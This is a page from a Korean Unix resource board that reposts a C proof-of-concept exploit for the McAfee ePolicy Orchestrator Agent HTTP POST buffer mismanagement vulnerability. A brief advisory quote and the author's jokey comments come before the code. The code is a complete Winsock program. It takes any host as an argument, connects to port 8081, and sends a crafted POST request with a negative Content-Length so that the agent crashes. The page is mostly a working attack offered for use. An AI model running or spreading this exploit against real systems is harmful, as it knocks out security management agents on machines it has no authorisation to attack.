BACKRUSH 유닉스명령 다음 자료실 Ascii Table 원격접속 달력,시간 프로세스 쉘

지하철노선 RFC문서 SUN FAQ SUN FAQ1 C메뉴얼 PHP메뉴얼 너구리 아스키월드 아이피서치

글쓴이: 맥

McAfee ePolicy Orchestrator Agent

/*

>McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement
Vulnerability PoC

>Ref : http://securityfocus.com/bid/9476
>discovered by : cyber_flash@hotmail.com

"
The McAfee ePolicy Orchestrator agent has been reported to a buffer
management vulnerability that may be exploited to crash the affected
agent. Although unconfirmed, it has
been reported that the issue may also allow a remote attacker to trigger
a buffer overflow vulnerability.

The issue reportedly presents itself, because certain values in HTTP POST
headers processed by the ePolicy Orchestrator are not sufficiently
sanitized.

"

>Hi NA-eye ;-) . Hurry-yup . relase a patch guyz !

+ PoC by Shashank Pandey a.k.a
G0D_0F_z10N +

> Greetz to my dewd 'Arun Jose' for 'Grass is not addictive..thing' while
i wuz writing this..!

> lame coding ..dont think too much abt it...

*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

int main(int argc, char *argv[])
{

WSADATA wsaData;

int s;

struct hostent *yo;
struct sockaddr_in wutever;

char badb0y[] =

"POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0
HTTP/1.0\r\n"
"Accept: application/octet-stream\r\n"
"Accept-Language: en-us\r\n"
"Content-Type: application/octet-stream\r\n"
"User-Agent: Godzilla/6.9 (compatible; SPIPE/3.0;
Windows)\r\n"
"Host: EPO_DIE\r\n"
"Content-Length: -1\r\n"
"Connection: Keep-Alive\r\n\r\n";

printf("\n--------------------------------- ");
printf("\n McAfee ePO agent overflow PoC \n");
printf("+++++++++++++++++++++++++++++++++\n");
printf(" by Shashank Pandey \n");
printf(" (reach_shash@linuxmail.org) \n");
printf("--------------------------------- \n");

if(WSAStartup(0x0101,&wsaData)!=0) {
printf("Error :Cudn't initiate winsock!");
return 0;
}

if(argc<2)

{printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]);
exit(0);}

if ( (yo = gethostbyname(argv[1]))==0)
{
printf("error: can't resolve '%s'",argv[1]);
return 1;
}

wutever.sin_port = htons(8081); // ePO agent uses the HTTP protocol to
communicate on port 8081
wutever.sin_family = AF_INET;
wutever.sin_addr = *((struct in_addr *)yo->h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}

if ((connect(s, (struct sockaddr *) &wutever, sizeof(wutever))) == -1){
printf("Error:Cudn't Connect\r\n");
return 1;
}

printf("\r\nCrashing the client...< it's a PoC dewd ;-) >\n");

send(s,badb0y,strlen(badb0y),0);

closesocket(s);

WSACleanup();

return 1;
}